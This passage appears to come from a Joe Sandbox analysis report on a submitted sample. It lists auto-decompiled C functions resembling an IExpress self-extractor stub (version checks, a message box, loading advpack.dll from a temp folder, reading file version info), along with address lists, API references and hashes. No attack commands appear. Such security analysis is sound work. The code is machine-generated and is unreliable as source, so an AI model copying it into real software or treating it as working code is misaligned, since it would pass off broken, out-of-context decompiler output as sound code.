                                                                                                                                                                                                      						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t138 = 0x4ca;
                                                                                                                                                                                                      					goto L44;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t138 = 0x4b4;
                                                                                                                                                                                                      					L44:
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					_push(0x10);
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					L65:
                                                                                                                                                                                                      					_t133 = _t138;
                                                                                                                                                                                                      					E00A644B9(0, _t138);
                                                                                                                                                                                                      					L66:
                                                                                                                                                                                                      					return E00A66CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





































                                                                                                                                                                                                      0x00a636f9
                                                                                                                                                                                                      0x00a63700
                                                                                                                                                                                                      0x00a6370c
                                                                                                                                                                                                      0x00a63716
                                                                                                                                                                                                      0x00a63718
                                                                                                                                                                                                      0x00a6371b
                                                                                                                                                                                                      0x00a63721
                                                                                                                                                                                                      0x00a6372b
                                                                                                                                                                                                      0x00a6373d
                                                                                                                                                                                                      0x00a63745
                                                                                                                                                                                                      0x00a63746
                                                                                                                                                                                                      0x00a63746
                                                                                                                                                                                                      0x00a63749
                                                                                                                                                                                                      0x00a637ab
                                                                                                                                                                                                      0x00a637ad
                                                                                                                                                                                                      0x00a637ae
                                                                                                                                                                                                      0x00a637b3
                                                                                                                                                                                                      0x00a637b8
                                                                                                                                                                                                      0x00a637b8
                                                                                                                                                                                                      0x00a637bf
                                                                                                                                                                                                      0x00a637bf
                                                                                                                                                                                                      0x00a637c5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a637cb
                                                                                                                                                                                                      0x00a637cd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a637d5
                                                                                                                                                                                                      0x00a637db
                                                                                                                                                                                                      0x00a637e8
                                                                                                                                                                                                      0x00a637ea
                                                                                                                                                                                                      0x00a637ea
                                                                                                                                                                                                      0x00a637ea
                                                                                                                                                                                                      0x00a637f0
                                                                                                                                                                                                      0x00a637f6
                                                                                                                                                                                                      0x00a63805
                                                                                                                                                                                                      0x00a63817
                                                                                                                                                                                                      0x00a6382b
                                                                                                                                                                                                      0x00a63830
                                                                                                                                                                                                      0x00a63836
                                                                                                                                                                                                      0x00a6383b
                                                                                                                                                                                                      0x00a6383d
                                                                                                                                                                                                      0x00a638eb
                                                                                                                                                                                                      0x00a638eb
                                                                                                                                                                                                      0x00a638f2
                                                                                                                                                                                                      0x00a6390c
                                                                                                                                                                                                      0x00a63911
                                                                                                                                                                                                      0x00a63911
                                                                                                                                                                                                      0x00a63913
                                                                                                                                                                                                      0x00a6394d
                                                                                                                                                                                                      0x00a6394d
                                                                                                                                                                                                      0x00a6394f
                                                                                                                                                                                                      0x00a638a9
                                                                                                                                                                                                      0x00a638a9
                                                                                                                                                                                                      0x00a638b0
                                                                                                                                                                                                      0x00a638b2
                                                                                                                                                                                                      0x00a638b9
                                                                                                                                                                                                      0x00a638bb
                                                                                                                                                                                                      0x00a638c1
                                                                                                                                                                                                      0x00a63975
                                                                                                                                                                                                      0x00a638c7
                                                                                                                                                                                                      0x00a638de
                                                                                                                                                                                                      0x00a638e0
                                                                                                                                                                                                      0x00a638e0
                                                                                                                                                                                                      0x00a6397b
                                                                                                                                                                                                      0x00a6397d
                                                                                                                                                                                                      0x00a639a9
                                                                                                                                                                                                      0x00a6397f
                                                                                                                                                                                                      0x00a63982
                                                                                                                                                                                                      0x00a6398b
                                                                                                                                                                                                      0x00a6398d
                                                                                                                                                                                                      0x00a6398f
                                                                                                                                                                                                      0x00a6399f
                                                                                                                                                                                                      0x00a639a1
                                                                                                                                                                                                      0x00a63991
                                                                                                                                                                                                      0x00a63991
                                                                                                                                                                                                      0x00a63991
                                                                                                                                                                                                      0x00a6398f
                                                                                                                                                                                                      0x00a639af
                                                                                                                                                                                                      0x00a639b6
                                                                                                                                                                                                      0x00a63a0f
                                                                                                                                                                                                      0x00a63a0f
                                                                                                                                                                                                      0x00a63a11
                                                                                                                                                                                                      0x00a63a13
                                                                                                                                                                                                      0x00a63a19
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a639b8
                                                                                                                                                                                                      0x00a639b8
                                                                                                                                                                                                      0x00a639ba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a639bc
                                                                                                                                                                                                      0x00a639bf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a639c3
                                                                                                                                                                                                      0x00a639c9
                                                                                                                                                                                                      0x00a639ce
                                                                                                                                                                                                      0x00a639d0
                                                                                                                                                                                                      0x00a639e3
                                                                                                                                                                                                      0x00a639e5
                                                                                                                                                                                                      0x00a639e6
                                                                                                                                                                                                      0x00a639f1
                                                                                                                                                                                                      0x00a639f7
                                                                                                                                                                                                      0x00a639fa
                                                                                                                                                                                                      0x00a63a01
                                                                                                                                                                                                      0x00a63a04
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63a06
                                                                                                                                                                                                      0x00a63a09
                                                                                                                                                                                                      0x00a63a09
                                                                                                                                                                                                      0x00a63a0b
                                                                                                                                                                                                      0x00a63a0b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63a09
                                                                                                                                                                                                      0x00a639fc
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a639fc
                                                                                                                                                                                                      0x00a639d3
                                                                                                                                                                                                      0x00a639d8
                                                                                                                                                                                                      0x00a639da
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a639dc
                                                                                                                                                                                                      0x00a639b6
                                                                                                                                                                                                      0x00a63955
                                                                                                                                                                                                      0x00a6395b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63961
                                                                                                                                                                                                      0x00a63963
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63969
                                                                                                                                                                                                      0x00a63969
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63969
                                                                                                                                                                                                      0x00a63915
                                                                                                                                                                                                      0x00a63915
                                                                                                                                                                                                      0x00a6391b
                                                                                                                                                                                                      0x00a6391f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6392d
                                                                                                                                                                                                      0x00a63933
                                                                                                                                                                                                      0x00a63938
                                                                                                                                                                                                      0x00a6393a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63940
                                                                                                                                                                                                      0x00a63946
                                                                                                                                                                                                      0x00a6394b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6394b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a638f2
                                                                                                                                                                                                      0x00a63843
                                                                                                                                                                                                      0x00a63845
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6384b
                                                                                                                                                                                                      0x00a6384d
                                                                                                                                                                                                      0x00a63883
                                                                                                                                                                                                      0x00a63885
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6389a
                                                                                                                                                                                                      0x00a6389e
                                                                                                                                                                                                      0x00a6389e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a638a0
                                                                                                                                                                                                      0x00a638a0
                                                                                                                                                                                                      0x00a638a2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a638a4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a638a4
                                                                                                                                                                                                      0x00a6384f
                                                                                                                                                                                                      0x00a63851
                                                                                                                                                                                                      0x00a63857
                                                                                                                                                                                                      0x00a6386e
                                                                                                                                                                                                      0x00a63877
                                                                                                                                                                                                      0x00a6387b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63881
                                                                                                                                                                                                      0x00a63859
                                                                                                                                                                                                      0x00a6385c
                                                                                                                                                                                                      0x00a63862
                                                                                                                                                                                                      0x00a63866
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63868
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a638f4
                                                                                                                                                                                                      0x00a638f4
                                                                                                                                                                                                      0x00a638f5
                                                                                                                                                                                                      0x00a638fb
                                                                                                                                                                                                      0x00a63901
                                                                                                                                                                                                      0x00a63901
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6390a
                                                                                                                                                                                                      0x00a6374b
                                                                                                                                                                                                      0x00a6374e
                                                                                                                                                                                                      0x00a6375c
                                                                                                                                                                                                      0x00a63764
                                                                                                                                                                                                      0x00a63769
                                                                                                                                                                                                      0x00a6376e
                                                                                                                                                                                                      0x00a63771
                                                                                                                                                                                                      0x00a6379c
                                                                                                                                                                                                      0x00a6379f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a637a3
                                                                                                                                                                                                      0x00a637a4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a637a4
                                                                                                                                                                                                      0x00a63773
                                                                                                                                                                                                      0x00a63777
                                                                                                                                                                                                      0x00a63778
                                                                                                                                                                                                      0x00a6377f
                                                                                                                                                                                                      0x00a63781
                                                                                                                                                                                                      0x00a6378e
                                                                                                                                                                                                      0x00a6378e
                                                                                                                                                                                                      0x00a63794
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63794
                                                                                                                                                                                                      0x00a63783
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63785
                                                                                                                                                                                                      0x00a6378c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6378c
                                                                                                                                                                                                      0x00a63750
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6372d
                                                                                                                                                                                                      0x00a6372d
                                                                                                                                                                                                      0x00a6396b
                                                                                                                                                                                                      0x00a6396b
                                                                                                                                                                                                      0x00a6396c
                                                                                                                                                                                                      0x00a6396e
                                                                                                                                                                                                      0x00a6396f
                                                                                                                                                                                                      0x00a63a1e
                                                                                                                                                                                                      0x00a63a1e
                                                                                                                                                                                                      0x00a63a22
                                                                                                                                                                                                      0x00a63a27
                                                                                                                                                                                                      0x00a63a3e
                                                                                                                                                                                                      0x00a63a3e

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00A63723
                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00A639C3
                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 00A639F1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$BeepVersion
                                                                                                                                                                                                      • String ID: 3$cent
                                                                                                                                                                                                      • API String ID: 2519184315-3438608206
                                                                                                                                                                                                      • Opcode ID: c232f1d1a8df4e71fbe99e50fb97335bb786665f5d95dcd4351893b49e54b4b2
                                                                                                                                                                                                      • Instruction ID: 1e8982303f3d5224a7fa869d4a7d612c8de8c2b610db22d916af75fbf10635ab
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c232f1d1a8df4e71fbe99e50fb97335bb786665f5d95dcd4351893b49e54b4b2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9191F1B3A012149BEF34CB65CD907EAB3B4EB51344F1541A9D88A97281DBB18F828F41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                                                                      			E00A66495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed char _t14;
                                                                                                                                                                                                      				struct HINSTANCE__* _t15;
                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                      				CHAR* _t26;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t27 = __esi;
                                                                                                                                                                                                      				_t18 = __ebx;
                                                                                                                                                                                                      				_t9 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				E00A61781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                      				_t26 = "advpack.dll";
                                                                                                                                                                                                      				E00A6658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                      				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                      					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      0x00a66495
                                                                                                                                                                                                      0x00a66495
                                                                                                                                                                                                      0x00a664a0
                                                                                                                                                                                                      0x00a664a7
                                                                                                                                                                                                      0x00a664ab
                                                                                                                                                                                                      0x00a664bd
                                                                                                                                                                                                      0x00a664c2
                                                                                                                                                                                                      0x00a664d3
                                                                                                                                                                                                      0x00a664df
                                                                                                                                                                                                      0x00a664e8
                                                                                                                                                                                                      0x00a66502
                                                                                                                                                                                                      0x00a664ee
                                                                                                                                                                                                      0x00a664f9
                                                                                                                                                                                                      0x00a664f9
                                                                                                                                                                                                      0x00a66516

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00A664DF
                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00A664F9
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00A66502
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$advpack.dll
                                                                                                                                                                                                      • API String ID: 438848745-1736355793
                                                                                                                                                                                                      • Opcode ID: c8cb302789d260d5145b80e766845b6ee523d3257514b1ac6c09b8164787f54d
                                                                                                                                                                                                      • Instruction ID: 31a934fb9e8253821486066aab7d8c4887b7d5291993177c2c6b8aed88f60eea
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8cb302789d260d5145b80e766845b6ee523d3257514b1ac6c09b8164787f54d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F01F430A04108ABDB60DBA4DC4AEEE7778EB61311F500299F596A31C0DFB09E8ACE51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A628E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				char* _v12;
                                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                                      				void* _v20;
                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                      				int _v28;
                                                                                                                                                                                                      				int _v32;
                                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                                      				int _v40;
                                                                                                                                                                                                      				void* _v44;
                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                      				long _t68;
                                                                                                                                                                                                      				void* _t70;
                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                      				void* _t79;
                                                                                                                                                                                                      				void* _t83;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				void* _t88;
                                                                                                                                                                                                      				intOrPtr _t93;
                                                                                                                                                                                                      				intOrPtr _t97;
                                                                                                                                                                                                      				intOrPtr _t99;
                                                                                                                                                                                                      				int _t101;
                                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                                      				void* _t106;
                                                                                                                                                                                                      				void* _t109;
                                                                                                                                                                                                      				void* _t110;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v12 = __edx;
                                                                                                                                                                                                      				_t99 = __ecx;
                                                                                                                                                                                                      				_t106 = 0;
                                                                                                                                                                                                      				_v16 = __ecx;
                                                                                                                                                                                                      				_t87 = 0;
                                                                                                                                                                                                      				_t103 = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                      					_t106 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t62 = 0;
                                                                                                                                                                                                      					_v8 = 0;
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                      						if(E00A62773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                      							goto L20;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                      						_v28 = _t68;
                                                                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                                                                      							_t99 = _v16;
                                                                                                                                                                                                      							_t70 = _v8 + _t99;
                                                                                                                                                                                                      							_t93 = _v24;
                                                                                                                                                                                                      							_t87 = _v20;
                                                                                                                                                                                                      							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                      								goto L18;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                      							if(_t103 != 0) {
                                                                                                                                                                                                      								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                      								_v36 = _t73;
                                                                                                                                                                                                      								if(_t73 != 0) {
                                                                                                                                                                                                      									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                      										L15:
                                                                                                                                                                                                      										GlobalUnlock(_t103);
                                                                                                                                                                                                      										_t99 = _v16;
                                                                                                                                                                                                      										L18:
                                                                                                                                                                                                      										_t87 = _t87 + 1;
                                                                                                                                                                                                      										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                      										_v20 = _t87;
                                                                                                                                                                                                      										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                      										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                      											continue;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L19;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t79 = _v44;
                                                                                                                                                                                                      										_t88 = _t106;
                                                                                                                                                                                                      										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                      										_t101 = _v28;
                                                                                                                                                                                                      										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                      										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                      										_t97 = _v48;
                                                                                                                                                                                                      										_v36 = _t83;
                                                                                                                                                                                                      										_t109 = _t83;
                                                                                                                                                                                                      										do {
                                                                                                                                                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00A62A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00A62A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                      											_t109 = _t109 + 0x18;
                                                                                                                                                                                                      											_t88 = _t88 + 4;
                                                                                                                                                                                                      										} while (_t88 < 8);
                                                                                                                                                                                                      										_t87 = _v20;
                                                                                                                                                                                                      										_t106 = 0;
                                                                                                                                                                                                      										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                      											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                      												GlobalUnlock(_t103);
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												goto L15;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L15;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L20:
                                                                                                                                                                                                      				 *_a8 = _t87;
                                                                                                                                                                                                      				if(_t103 != 0) {
                                                                                                                                                                                                      					GlobalFree(_t103);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t106;
                                                                                                                                                                                                      			}

































                                                                                                                                                                                                      0x00a628f1
                                                                                                                                                                                                      0x00a628f4
                                                                                                                                                                                                      0x00a628f7
                                                                                                                                                                                                      0x00a628f9
                                                                                                                                                                                                      0x00a628fc
                                                                                                                                                                                                      0x00a628ff
                                                                                                                                                                                                      0x00a62901
                                                                                                                                                                                                      0x00a62907
                                                                                                                                                                                                      0x00a62a62
                                                                                                                                                                                                      0x00a62a64
                                                                                                                                                                                                      0x00a6290d
                                                                                                                                                                                                      0x00a6290d
                                                                                                                                                                                                      0x00a6290f
                                                                                                                                                                                                      0x00a62912
                                                                                                                                                                                                      0x00a62920
                                                                                                                                                                                                      0x00a62937
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62944
                                                                                                                                                                                                      0x00a6294a
                                                                                                                                                                                                      0x00a6294f
                                                                                                                                                                                                      0x00a62a2f
                                                                                                                                                                                                      0x00a62a32
                                                                                                                                                                                                      0x00a62a34
                                                                                                                                                                                                      0x00a62a37
                                                                                                                                                                                                      0x00a62a41
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62955
                                                                                                                                                                                                      0x00a6295e
                                                                                                                                                                                                      0x00a62962
                                                                                                                                                                                                      0x00a62969
                                                                                                                                                                                                      0x00a6296f
                                                                                                                                                                                                      0x00a62974
                                                                                                                                                                                                      0x00a6298c
                                                                                                                                                                                                      0x00a62a20
                                                                                                                                                                                                      0x00a62a21
                                                                                                                                                                                                      0x00a62a27
                                                                                                                                                                                                      0x00a62a4c
                                                                                                                                                                                                      0x00a62a4f
                                                                                                                                                                                                      0x00a62a50
                                                                                                                                                                                                      0x00a62a53
                                                                                                                                                                                                      0x00a62a56
                                                                                                                                                                                                      0x00a62a5c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a629b2
                                                                                                                                                                                                      0x00a629b2
                                                                                                                                                                                                      0x00a629b5
                                                                                                                                                                                                      0x00a629bd
                                                                                                                                                                                                      0x00a629c3
                                                                                                                                                                                                      0x00a629cc
                                                                                                                                                                                                      0x00a629d5
                                                                                                                                                                                                      0x00a629d7
                                                                                                                                                                                                      0x00a629da
                                                                                                                                                                                                      0x00a629dd
                                                                                                                                                                                                      0x00a629df
                                                                                                                                                                                                      0x00a629ec
                                                                                                                                                                                                      0x00a629f8
                                                                                                                                                                                                      0x00a629fc
                                                                                                                                                                                                      0x00a629ff
                                                                                                                                                                                                      0x00a62a02
                                                                                                                                                                                                      0x00a62a07
                                                                                                                                                                                                      0x00a62a0a
                                                                                                                                                                                                      0x00a62a0f
                                                                                                                                                                                                      0x00a62a19
                                                                                                                                                                                                      0x00a62a81
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62a0f
                                                                                                                                                                                                      0x00a6298c
                                                                                                                                                                                                      0x00a62974
                                                                                                                                                                                                      0x00a62962
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6294f
                                                                                                                                                                                                      0x00a62912
                                                                                                                                                                                                      0x00a62a65
                                                                                                                                                                                                      0x00a62a68
                                                                                                                                                                                                      0x00a62a6c
                                                                                                                                                                                                      0x00a62a6f
                                                                                                                                                                                                      0x00a62a6f
                                                                                                                                                                                                      0x00a62a7d

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GlobalFree.KERNEL32 ref: 00A62A6F
                                                                                                                                                                                                        • Part of subcall function 00A62773: CharUpperA.USER32(FEEDC76E,00000000,00000000,00000000), ref: 00A627A8
                                                                                                                                                                                                        • Part of subcall function 00A62773: CharNextA.USER32(0000054D), ref: 00A627B5
                                                                                                                                                                                                        • Part of subcall function 00A62773: CharNextA.USER32(00000000), ref: 00A627BC
                                                                                                                                                                                                        • Part of subcall function 00A62773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A62829
                                                                                                                                                                                                        • Part of subcall function 00A62773: RegQueryValueExA.ADVAPI32(?,00A61140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A62852
                                                                                                                                                                                                        • Part of subcall function 00A62773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A62870
                                                                                                                                                                                                        • Part of subcall function 00A62773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A628A0
                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00A63938,?,?,?,?,-00000005), ref: 00A62958
                                                                                                                                                                                                      • GlobalLock.KERNEL32 ref: 00A62969
                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A63938,?,?,?,?,-00000005,?), ref: 00A62A21
